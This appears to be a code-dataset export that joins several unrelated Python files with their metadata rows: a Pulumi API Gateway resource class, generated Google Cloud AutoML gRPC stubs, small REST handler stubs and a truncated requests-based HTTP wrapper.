        __self__._internal_init(resource_name, opts, **resource_args.__dict__)
def _internal_init(__self__,
                   resource_name: str,
                   opts: Optional[pulumi.ResourceOptions] = None,
                   api_key_source: Optional[pulumi.Input[str]] = None,
                   binary_media_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                   body: Optional[pulumi.Input[str]] = None,
                   description: Optional[pulumi.Input[str]] = None,
                   disable_execute_api_endpoint: Optional[pulumi.Input[bool]] = None,
                   endpoint_configuration: Optional[pulumi.Input[pulumi.InputType['RestApiEndpointConfigurationArgs']]] = None,
                   minimum_compression_size: Optional[pulumi.Input[int]] = None,
                   name: Optional[pulumi.Input[str]] = None,
                   parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                   policy: Optional[pulumi.Input[str]] = None,
                   tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                   __props__=None):
    """Shared implementation behind both constructor overloads.

    Validates ``opts``, populates the resource's input properties, and
    registers the resource with the Pulumi engine via the base-class
    constructor.

    :raises TypeError: if ``opts`` is not a ``pulumi.ResourceOptions``, or if
        ``__props__`` is supplied without ``opts.id`` (``__props__`` is only
        valid when rehydrating an existing resource via ``get``).
    """
    if opts is None:
        opts = pulumi.ResourceOptions()
    if not isinstance(opts, pulumi.ResourceOptions):
        raise TypeError('Expected resource options to be a ResourceOptions instance')
    # Pin the provider plugin version when the caller did not choose one.
    if opts.version is None:
        opts.version = _utilities.get_version()
    # opts.id set => lookup of an existing resource (props come via __props__);
    # opts.id unset => creating a new resource, so build props from arguments.
    if opts.id is None:
        if __props__ is not None:
            raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
        __props__ = RestApiArgs.__new__(RestApiArgs)
        __props__.__dict__["api_key_source"] = api_key_source
        __props__.__dict__["binary_media_types"] = binary_media_types
        __props__.__dict__["body"] = body
        __props__.__dict__["description"] = description
        __props__.__dict__["disable_execute_api_endpoint"] = disable_execute_api_endpoint
        __props__.__dict__["endpoint_configuration"] = endpoint_configuration
        __props__.__dict__["minimum_compression_size"] = minimum_compression_size
        __props__.__dict__["name"] = name
        __props__.__dict__["parameters"] = parameters
        __props__.__dict__["policy"] = policy
        __props__.__dict__["tags"] = tags
        # Output-only properties: resolved by the provider, never set by callers.
        __props__.__dict__["arn"] = None
        __props__.__dict__["created_date"] = None
        __props__.__dict__["execution_arn"] = None
        __props__.__dict__["root_resource_id"] = None
        __props__.__dict__["tags_all"] = None
    super(RestApi, __self__).__init__(
        'aws:apigateway/restApi:RestApi',
        resource_name,
        __props__,
        opts)
@staticmethod
def get(resource_name: str,
        id: pulumi.Input[str],
        opts: Optional[pulumi.ResourceOptions] = None,
        api_key_source: Optional[pulumi.Input[str]] = None,
        arn: Optional[pulumi.Input[str]] = None,
        binary_media_types: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
        body: Optional[pulumi.Input[str]] = None,
        created_date: Optional[pulumi.Input[str]] = None,
        description: Optional[pulumi.Input[str]] = None,
        disable_execute_api_endpoint: Optional[pulumi.Input[bool]] = None,
        endpoint_configuration: Optional[pulumi.Input[pulumi.InputType['RestApiEndpointConfigurationArgs']]] = None,
        execution_arn: Optional[pulumi.Input[str]] = None,
        minimum_compression_size: Optional[pulumi.Input[int]] = None,
        name: Optional[pulumi.Input[str]] = None,
        parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
        policy: Optional[pulumi.Input[str]] = None,
        root_resource_id: Optional[pulumi.Input[str]] = None,
        tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
        tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'RestApi':
    """
    Get an existing RestApi resource's state with the given name, id, and optional extra
    properties used to qualify the lookup.

    For arguments that also exist in an imported OpenAPI specification
    (`body`), a value supplied here overrides the corresponding OpenAPI
    value when the two differ.

    :param str resource_name: The unique name of the resulting resource.
    :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
    :param pulumi.ResourceOptions opts: Options for the resource.
    :param pulumi.Input[str] api_key_source: Source of the API key for requests: `HEADER` (default) or `AUTHORIZER`.
    :param pulumi.Input[str] arn: Amazon Resource Name (ARN).
    :param pulumi.Input[Sequence[pulumi.Input[str]]] binary_media_types: List of binary media types supported by the REST API (UTF-8-encoded text only by default).
    :param pulumi.Input[str] body: OpenAPI specification that defines the set of routes and integrations of the REST API.
    :param pulumi.Input[str] created_date: The creation date of the REST API.
    :param pulumi.Input[str] description: Description of the REST API.
    :param pulumi.Input[bool] disable_execute_api_endpoint: Whether to disable the default execute-api endpoint (defaults to `false`).
    :param pulumi.Input[pulumi.InputType['RestApiEndpointConfigurationArgs']] endpoint_configuration: Configuration block defining the API endpoint type.
    :param pulumi.Input[str] execution_arn: Execution ARN part used in `lambda_permission`'s `source_arn`,
        e.g., `arn:aws:execute-api:eu-west-2:123456789012:z4675bid1j`.
    :param pulumi.Input[int] minimum_compression_size: Minimum response size to compress, between `-1` and `10485760` (10MB); `-1` disables compression (default).
    :param pulumi.Input[str] name: Name of the REST API.
    :param pulumi.Input[Mapping[str, pulumi.Input[str]]] parameters: Map of customizations for importing the specification in the `body` argument.
    :param pulumi.Input[str] policy: JSON formatted policy document that controls access to the API Gateway; prefer the `apigateway.RestApiPolicy` resource.
    :param pulumi.Input[str] root_resource_id: The resource ID of the REST API's root.
    :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Key-value map of resource tags. If a provider `default_tags` block is configured, tags with matching keys overwrite the provider-level ones.
    :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: Map of tags assigned to the resource, including those inherited from the provider.
    """
    # Merging id into opts tells the engine to look up existing state
    # instead of creating a new resource.
    opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
    __props__ = _RestApiState.__new__(_RestApiState)
    __props__.__dict__["api_key_source"] = api_key_source
    __props__.__dict__["arn"] = arn
    __props__.__dict__["binary_media_types"] = binary_media_types
    __props__.__dict__["body"] = body
    __props__.__dict__["created_date"] = created_date
    __props__.__dict__["description"] = description
    __props__.__dict__["disable_execute_api_endpoint"] = disable_execute_api_endpoint
    __props__.__dict__["endpoint_configuration"] = endpoint_configuration
    __props__.__dict__["execution_arn"] = execution_arn
    __props__.__dict__["minimum_compression_size"] = minimum_compression_size
    __props__.__dict__["name"] = name
    __props__.__dict__["parameters"] = parameters
    __props__.__dict__["policy"] = policy
    __props__.__dict__["root_resource_id"] = root_resource_id
    __props__.__dict__["tags"] = tags
    __props__.__dict__["tags_all"] = tags_all
    return RestApi(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="apiKeySource")
def api_key_source(self) -> pulumi.Output[str]:
    """
    Source of the API key for requests: `HEADER` (default) or `AUTHORIZER`.
    """
    return pulumi.get(self, "api_key_source")

@property
@pulumi.getter
def arn(self) -> pulumi.Output[str]:
    """
    Amazon Resource Name (ARN).
    """
    return pulumi.get(self, "arn")

@property
@pulumi.getter(name="binaryMediaTypes")
def binary_media_types(self) -> pulumi.Output[Sequence[str]]:
    """
    List of binary media types supported by the REST API; by default only
    UTF-8-encoded text payloads are supported.
    """
    return pulumi.get(self, "binary_media_types")

@property
@pulumi.getter
def body(self) -> pulumi.Output[Optional[str]]:
    """
    OpenAPI specification that defines the set of routes and integrations
    to create as part of the REST API.
    """
    return pulumi.get(self, "body")

@property
@pulumi.getter(name="createdDate")
def created_date(self) -> pulumi.Output[str]:
    """
    The creation date of the REST API.
    """
    return pulumi.get(self, "created_date")

@property
@pulumi.getter
def description(self) -> pulumi.Output[str]:
    """
    Description of the REST API.
    """
    return pulumi.get(self, "description")

@property
@pulumi.getter(name="disableExecuteApiEndpoint")
def disable_execute_api_endpoint(self) -> pulumi.Output[bool]:
    """
    Whether the default execute-api endpoint is disabled. Defaults to `false`.
    """
    return pulumi.get(self, "disable_execute_api_endpoint")

@property
@pulumi.getter(name="endpointConfiguration")
def endpoint_configuration(self) -> pulumi.Output['outputs.RestApiEndpointConfiguration']:
    """
    Configuration block defining API endpoint configuration, including
    endpoint type.
    """
    return pulumi.get(self, "endpoint_configuration")

@property
@pulumi.getter(name="executionArn")
def execution_arn(self) -> pulumi.Output[str]:
    """
    The execution ARN part to be used in `lambda_permission`'s `source_arn`
    when allowing API Gateway to invoke a Lambda function, e.g.,
    `arn:aws:execute-api:eu-west-2:123456789012:z4675bid1j`.
    """
    return pulumi.get(self, "execution_arn")

@property
@pulumi.getter(name="minimumCompressionSize")
def minimum_compression_size(self) -> pulumi.Output[Optional[int]]:
    """
    Minimum response size to compress, between `-1` and `10485760` (10MB);
    `-1` disables compression (default).
    """
    return pulumi.get(self, "minimum_compression_size")

@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
    """
    Name of the REST API.
    """
    return pulumi.get(self, "name")

@property
@pulumi.getter
def parameters(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
    """
    Map of customizations for importing the specification in the `body`
    argument (e.g. set `ignore` to `documentation` to skip DocumentationParts).
    """
    return pulumi.get(self, "parameters")

@property
@pulumi.getter
def policy(self) -> pulumi.Output[str]:
    """
    JSON formatted policy document that controls access to the API Gateway;
    the `apigateway.RestApiPolicy` resource is recommended instead.
    """
    return pulumi.get(self, "policy")

@property
@pulumi.getter(name="rootResourceId")
def root_resource_id(self) -> pulumi.Output[str]:
    """
    The resource ID of the REST API's root.
    """
    return pulumi.get(self, "root_resource_id")

@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
    """
    Key-value map of resource tags. If a provider `default_tags` block is
    configured, tags with matching keys overwrite the provider-level ones.
    """
    return pulumi.get(self, "tags")

@property
@pulumi.getter(name="tagsAll")
def tags_all(self) -> pulumi.Output[Mapping[str, str]]:
    """
    Map of tags assigned to the resource, including those inherited from
    the provider.
    """
    return pulumi.get(self, "tags_all")
| 75.492616
| 819
| 0.710327
| 9,109
| 71,567
| 5.461522
| 0.039412
| 0.049086
| 0.038272
| 0.026975
| 0.960462
| 0.953708
| 0.944863
| 0.939456
| 0.938431
| 0.929124
| 0
| 0.003689
| 0.196906
| 71,567
| 947
| 820
| 75.572334
| 0.861888
| 0.630081
| 0
| 0.784017
| 1
| 0
| 0.107608
| 0.052081
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166307
| false
| 0.00216
| 0.015119
| 0
| 0.282937
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0aa6fa0747112aca48454556f6dd7125fd3870c7
| 259
|
py
|
Python
|
finally/__init__.py
|
insanj/finally
|
ef5bb17ca4444213ee6eb790fe85c8ea54a88879
|
[
"Apache-2.0"
] | null | null | null |
finally/__init__.py
|
insanj/finally
|
ef5bb17ca4444213ee6eb790fe85c8ea54a88879
|
[
"Apache-2.0"
] | null | null | null |
finally/__init__.py
|
insanj/finally
|
ef5bb17ca4444213ee6eb790fe85c8ea54a88879
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
from finally_file import *
from finally_flask import *
from finally_importer import *
from finally_parser import *
from finally_song import *
from finally_storage import *
from finally_storage_providers import *
from finally_helpers import *
| 28.777778
| 39
| 0.826255
| 36
| 259
| 5.694444
| 0.388889
| 0.429268
| 0.580488
| 0.234146
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123552
| 259
| 9
| 40
| 28.777778
| 0.903084
| 0.061776
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0ad90914659506e5cfc7cdfc810949f61da02ec3
| 21,842
|
py
|
Python
|
automl/google/cloud/automl_v1/proto/service_pb2_grpc.py
|
conwaychriscosmo/google-cloud-python
|
8e7b7f8a5f4bb04d13f4d88ec3848f017faf834a
|
[
"Apache-2.0"
] | 1
|
2019-03-26T21:44:51.000Z
|
2019-03-26T21:44:51.000Z
|
automl/google/cloud/automl_v1/proto/service_pb2_grpc.py
|
conwaychriscosmo/google-cloud-python
|
8e7b7f8a5f4bb04d13f4d88ec3848f017faf834a
|
[
"Apache-2.0"
] | 40
|
2019-07-16T10:04:48.000Z
|
2020-01-20T09:04:59.000Z
|
automl/google/cloud/automl_v1/proto/service_pb2_grpc.py
|
conwaychriscosmo/google-cloud-python
|
8e7b7f8a5f4bb04d13f4d88ec3848f017faf834a
|
[
"Apache-2.0"
] | 2
|
2019-07-18T00:05:31.000Z
|
2019-11-27T14:17:22.000Z
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from google.cloud.automl_v1.proto import (
annotation_spec_pb2 as google_dot_cloud_dot_automl__v1_dot_proto_dot_annotation__spec__pb2,
)
from google.cloud.automl_v1.proto import (
dataset_pb2 as google_dot_cloud_dot_automl__v1_dot_proto_dot_dataset__pb2,
)
from google.cloud.automl_v1.proto import (
model_evaluation_pb2 as google_dot_cloud_dot_automl__v1_dot_proto_dot_model__evaluation__pb2,
)
from google.cloud.automl_v1.proto import (
model_pb2 as google_dot_cloud_dot_automl__v1_dot_proto_dot_model__pb2,
)
from google.cloud.automl_v1.proto import (
service_pb2 as google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2,
)
from google.longrunning import (
operations_pb2 as google_dot_longrunning_dot_operations__pb2,
)
class AutoMlStub(object):
    """Client-side stub for the AutoML Server API.

    The resource names are assigned by the server. The server never reuses
    names that it has created after the resources with those names are
    deleted.

    An ID of a resource is the last element of the item's resource name. For
    `projects/{project_id}/locations/{location_id}/datasets/{dataset_id}`, then
    the id for the item is `{dataset_id}`.

    Currently the only supported `location_id` is "us-central1".

    On any input that is documented to expect a string parameter in
    snake_case or kebab-case, either of those cases is accepted.
    """

    def __init__(self, channel):
        """Constructor.

        Args:
          channel: A grpc.Channel.
        """
        # Short aliases for the generated protobuf modules.
        _svc = google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2
        _ops = google_dot_longrunning_dot_operations__pb2
        _ds = google_dot_cloud_dot_automl__v1_dot_proto_dot_dataset__pb2
        _mdl = google_dot_cloud_dot_automl__v1_dot_proto_dot_model__pb2
        _spec = google_dot_cloud_dot_automl__v1_dot_proto_dot_annotation__spec__pb2
        _eval = google_dot_cloud_dot_automl__v1_dot_proto_dot_model__evaluation__pb2
        # (method name, request message, response message) for every RPC on
        # the google.cloud.automl.v1.AutoMl service.
        rpc_table = (
            ("CreateDataset", _svc.CreateDatasetRequest, _ops.Operation),
            ("GetDataset", _svc.GetDatasetRequest, _ds.Dataset),
            ("ListDatasets", _svc.ListDatasetsRequest, _svc.ListDatasetsResponse),
            ("UpdateDataset", _svc.UpdateDatasetRequest, _ds.Dataset),
            ("DeleteDataset", _svc.DeleteDatasetRequest, _ops.Operation),
            ("ImportData", _svc.ImportDataRequest, _ops.Operation),
            ("ExportData", _svc.ExportDataRequest, _ops.Operation),
            ("GetAnnotationSpec", _svc.GetAnnotationSpecRequest, _spec.AnnotationSpec),
            ("CreateModel", _svc.CreateModelRequest, _ops.Operation),
            ("GetModel", _svc.GetModelRequest, _mdl.Model),
            ("ListModels", _svc.ListModelsRequest, _svc.ListModelsResponse),
            ("DeleteModel", _svc.DeleteModelRequest, _ops.Operation),
            ("UpdateModel", _svc.UpdateModelRequest, _mdl.Model),
            ("DeployModel", _svc.DeployModelRequest, _ops.Operation),
            ("UndeployModel", _svc.UndeployModelRequest, _ops.Operation),
            ("ExportModel", _svc.ExportModelRequest, _ops.Operation),
            ("GetModelEvaluation", _svc.GetModelEvaluationRequest, _eval.ModelEvaluation),
            ("ListModelEvaluations", _svc.ListModelEvaluationsRequest, _svc.ListModelEvaluationsResponse),
        )
        # One unary-unary callable per RPC, exposed as an instance attribute
        # (self.CreateDataset, self.GetDataset, ...), exactly as in the
        # unrolled generated form.
        for rpc_name, request_cls, response_cls in rpc_table:
            setattr(
                self,
                rpc_name,
                channel.unary_unary(
                    "/google.cloud.automl.v1.AutoMl/" + rpc_name,
                    request_serializer=request_cls.SerializeToString,
                    response_deserializer=response_cls.FromString,
                ),
            )
class AutoMlServicer(object):
"""AutoML Server API.
The resource names are assigned by the server.
The server never reuses names that it has created after the resources with
those names are deleted.
An ID of a resource is the last element of the item's resource name. For
`projects/{project_id}/locations/{location_id}/datasets/{dataset_id}`, then
the id for the item is `{dataset_id}`.
Currently the only supported `location_id` is "us-central1".
On any input that is documented to expect a string parameter in
snake_case or kebab-case, either of those cases is accepted.
"""
def CreateDataset(self, request, context):
"""Creates a dataset.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def GetDataset(self, request, context):
"""Gets a dataset.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def ListDatasets(self, request, context):
"""Lists datasets in a project.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def UpdateDataset(self, request, context):
"""Updates a dataset.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def DeleteDataset(self, request, context):
"""Deletes a dataset and all of its contents.
Returns empty response in the
[response][google.longrunning.Operation.response] field when it completes,
and `delete_details` in the
[metadata][google.longrunning.Operation.metadata] field.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def ImportData(self, request, context):
"""Imports data into a dataset.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def ExportData(self, request, context):
"""Exports dataset's data to the provided output location.
Returns an empty response in the
[response][google.longrunning.Operation.response] field when it completes.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def GetAnnotationSpec(self, request, context):
"""Gets an annotation spec.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def CreateModel(self, request, context):
"""Creates a model.
Returns a Model in the [response][google.longrunning.Operation.response]
field when it completes.
When you create a model, several model evaluations are created for it:
a global evaluation, and one evaluation for each annotation spec.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def GetModel(self, request, context):
"""Gets a model.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def ListModels(self, request, context):
"""Lists models.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def DeleteModel(self, request, context):
"""Deletes a model.
Returns `google.protobuf.Empty` in the
[response][google.longrunning.Operation.response] field when it completes,
and `delete_details` in the
[metadata][google.longrunning.Operation.metadata] field.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def UpdateModel(self, request, context):
"""Updates a model.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def DeployModel(self, request, context):
"""Deploys a model. If a model is already deployed, deploying it with the
same parameters has no effect. Deploying with different parametrs
(as e.g. changing
[node_number][google.cloud.automl.v1.ImageObjectDetectionModelDeploymentMetadata.node_number])
will reset the deployment state without pausing the model's availability.
Only applicable for Text Classification, Image Object Detection; all other
domains manage deployment automatically.
Returns an empty response in the
[response][google.longrunning.Operation.response] field when it completes.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details("Method not implemented!")
raise NotImplementedError("Method not implemented!")
def UndeployModel(self, request, context):
    """Undeploys a model; no effect if the model is not deployed.

    Only applicable for Text Classification and Image Object Detection;
    all other domains manage deployment automatically. Returns an empty
    response in the [response][google.longrunning.Operation.response]
    field when it completes.

    Default stub: reports UNIMPLEMENTED to the client.
    """
    msg = "Method not implemented!"
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details(msg)
    raise NotImplementedError(msg)
def ExportModel(self, request, context):
    """Exports a trained, "export-able", model to a user specified Google
    Cloud Storage location.

    A model is considered export-able if and only if it has an export
    format defined for it in
    [ModelExportOutputConfig][google.cloud.automl.v1.ModelExportOutputConfig].
    Returns an empty response in the
    [response][google.longrunning.Operation.response] field when it
    completes.

    Default stub: reports UNIMPLEMENTED to the client.
    """
    msg = "Method not implemented!"
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details(msg)
    raise NotImplementedError(msg)
def GetModelEvaluation(self, request, context):
    """Gets a model evaluation. Default stub: reports UNIMPLEMENTED."""
    msg = "Method not implemented!"
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details(msg)
    raise NotImplementedError(msg)
def ListModelEvaluations(self, request, context):
    """Lists model evaluations. Default stub: reports UNIMPLEMENTED."""
    msg = "Method not implemented!"
    context.set_code(grpc.StatusCode.UNIMPLEMENTED)
    context.set_details(msg)
    raise NotImplementedError(msg)
def add_AutoMlServicer_to_server(servicer, server):
    """Registers the AutoMl servicer's RPC handlers on *server*.

    Every AutoMl method is a unary-unary RPC, so the handler table is
    built from one (method name, request type, response type) spec per
    RPC rather than spelling each handler out by hand. The resulting
    handlers are identical to the hand-written mapping.
    """
    _service = google_dot_cloud_dot_automl__v1_dot_proto_dot_service__pb2
    _dataset = google_dot_cloud_dot_automl__v1_dot_proto_dot_dataset__pb2
    _model = google_dot_cloud_dot_automl__v1_dot_proto_dot_model__pb2
    _operations = google_dot_longrunning_dot_operations__pb2
    _annotation_spec = google_dot_cloud_dot_automl__v1_dot_proto_dot_annotation__spec__pb2
    _model_evaluation = google_dot_cloud_dot_automl__v1_dot_proto_dot_model__evaluation__pb2
    # (servicer method name, request message type, response message type)
    method_specs = (
        ("CreateDataset", _service.CreateDatasetRequest, _operations.Operation),
        ("GetDataset", _service.GetDatasetRequest, _dataset.Dataset),
        ("ListDatasets", _service.ListDatasetsRequest, _service.ListDatasetsResponse),
        ("UpdateDataset", _service.UpdateDatasetRequest, _dataset.Dataset),
        ("DeleteDataset", _service.DeleteDatasetRequest, _operations.Operation),
        ("ImportData", _service.ImportDataRequest, _operations.Operation),
        ("ExportData", _service.ExportDataRequest, _operations.Operation),
        ("GetAnnotationSpec", _service.GetAnnotationSpecRequest, _annotation_spec.AnnotationSpec),
        ("CreateModel", _service.CreateModelRequest, _operations.Operation),
        ("GetModel", _service.GetModelRequest, _model.Model),
        ("ListModels", _service.ListModelsRequest, _service.ListModelsResponse),
        ("DeleteModel", _service.DeleteModelRequest, _operations.Operation),
        ("UpdateModel", _service.UpdateModelRequest, _model.Model),
        ("DeployModel", _service.DeployModelRequest, _operations.Operation),
        ("UndeployModel", _service.UndeployModelRequest, _operations.Operation),
        ("ExportModel", _service.ExportModelRequest, _operations.Operation),
        ("GetModelEvaluation", _service.GetModelEvaluationRequest, _model_evaluation.ModelEvaluation),
        ("ListModelEvaluations", _service.ListModelEvaluationsRequest, _service.ListModelEvaluationsResponse),
    )
    rpc_method_handlers = {
        name: grpc.unary_unary_rpc_method_handler(
            getattr(servicer, name),
            request_deserializer=request_type.FromString,
            response_serializer=response_type.SerializeToString,
        )
        for name, request_type, response_type in method_specs
    }
    generic_handler = grpc.method_handlers_generic_handler(
        "google.cloud.automl.v1.AutoMl", rpc_method_handlers
    )
    server.add_generic_rpc_handlers((generic_handler,))
| 52.378897
| 138
| 0.754189
| 2,456
| 21,842
| 6.267508
| 0.095684
| 0.044176
| 0.053661
| 0.065159
| 0.827064
| 0.814071
| 0.808484
| 0.76184
| 0.708309
| 0.703242
| 0
| 0.00952
| 0.177594
| 21,842
| 416
| 139
| 52.504808
| 0.847409
| 0.163584
| 0
| 0.366548
| 1
| 0
| 0.103571
| 0.045072
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071174
| false
| 0
| 0.049822
| 0
| 0.128114
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c1063d4a10db2e9566f883abcc1018079ec06b3
| 311
|
py
|
Python
|
linux/rest/funcs_resource.py
|
petergyorgy/virtue
|
3b4dbfbdf9f5e121d9c9887d675fdd3065ecdd3b
|
[
"BSD-3-Clause"
] | null | null | null |
linux/rest/funcs_resource.py
|
petergyorgy/virtue
|
3b4dbfbdf9f5e121d9c9887d675fdd3065ecdd3b
|
[
"BSD-3-Clause"
] | null | null | null |
linux/rest/funcs_resource.py
|
petergyorgy/virtue
|
3b4dbfbdf9f5e121d9c9887d675fdd3065ecdd3b
|
[
"BSD-3-Clause"
] | null | null | null |
def resource_get_func(args):
    """Stub REST handler: resource GET is not implemented yet."""
    return dict(code=254, error="notImplemented")
def resource_list_func(args):
    """Stub REST handler: resource listing is not implemented yet."""
    return dict(code=254, error="notImplemented")
def resource_attach_func(args):
    """Stub REST handler: resource attach is not implemented yet."""
    return dict(code=254, error="notImplemented")
def resource_detach_func(args):
    """Stub REST handler: resource detach is not implemented yet."""
    return dict(code=254, error="notImplemented")
| 34.555556
| 46
| 0.742765
| 40
| 311
| 5.575
| 0.325
| 0.197309
| 0.251121
| 0.32287
| 0.865471
| 0.865471
| 0.865471
| 0.686099
| 0.686099
| 0
| 0
| 0.041812
| 0.07717
| 311
| 8
| 47
| 38.875
| 0.735192
| 0
| 0
| 0.5
| 0
| 0
| 0.29582
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
7c2376ef857199baf858634858fc18b20c8659ad
| 3,657
|
py
|
Python
|
pyrez/http.py
|
EthanHicks1/Pyrez
|
022d62ae893594c2ddcd7fac5e740c693fd4fd54
|
[
"MIT"
] | null | null | null |
pyrez/http.py
|
EthanHicks1/Pyrez
|
022d62ae893594c2ddcd7fac5e740c693fd4fd54
|
[
"MIT"
] | null | null | null |
pyrez/http.py
|
EthanHicks1/Pyrez
|
022d62ae893594c2ddcd7fac5e740c693fd4fd54
|
[
"MIT"
] | null | null | null |
from sys import version_info as pythonVersion
import requests
class HttpRequest():
    """Thin convenience wrapper around the ``requests`` library.

    Every verb helper percent-encodes spaces in the URL and funnels
    through :meth:`request`. When no ``headers`` are supplied for a
    call, the instance's configured ``self.headers`` are used.

    Fixes vs. the original:
    - ``__init__`` referenced the bare name ``defaultHeaders`` at call
      time; class attributes are not in method scope, so passing
      ``headers=None`` explicitly raised NameError.
    - The verb helpers defaulted to the module-wide ``defaultHeaders``
      and bypassed ``self.request``, so per-instance headers were
      silently ignored. They now delegate to ``self.request``.
    - Mutable class-level dict is no longer used as a default argument;
      ``None`` is the sentinel instead.
    """

    # Shared default headers advertising the wrapper and Python version.
    defaultHeaders = { "user-agent": "HttpRequestWrapper [Python/{0.major}.{0.minor}]".format(pythonVersion) }
    # NOTE(review): no method below reads this attribute -- kept only for
    # backward compatibility with existing callers.
    timeout = 500

    def __init__(self, headers=None):
        """Store per-call default headers; ``None`` selects ``defaultHeaders``."""
        self.headers = HttpRequest.defaultHeaders if headers is None else headers

    def request(self, method, url, params=None, data=None, headers=None, cookies=None, files=None, auth=None, timeout=None, allowRedirects=False, proxies=None, hooks=None, stream=False, verify=None, cert=None):
        """Issue *method* on *url* via ``requests.request``.

        ``headers=None`` falls back to ``self.headers``. Note the
        camelCase ``allowRedirects`` maps to requests' ``allow_redirects``.
        """
        return requests.request(method=method, url=url, params=params, data=data, headers=self.headers if headers is None else headers, cookies=cookies, files=files, auth=auth, timeout=timeout, allow_redirects=allowRedirects, proxies=proxies, hooks=hooks, stream=stream, verify=verify, cert=cert)

    def get(self, url, params=None, data=None, headers=None, cookies=None, files=None, auth=None, timeout=None, allowRedirects=False, proxies=None, hooks=None, stream=False, verify=None, cert=None):
        """HTTP GET with spaces in *url* percent-encoded."""
        return self.request('GET', url=url.replace(' ', '%20'), params=params, data=data, headers=headers, cookies=cookies, files=files, auth=auth, timeout=timeout, allowRedirects=allowRedirects, proxies=proxies, hooks=hooks, stream=stream, verify=verify, cert=cert)

    def post(self, url, params=None, data=None, headers=None, cookies=None, files=None, auth=None, timeout=None, allowRedirects=False, proxies=None, hooks=None, stream=False, verify=None, cert=None):
        """HTTP POST with spaces in *url* percent-encoded."""
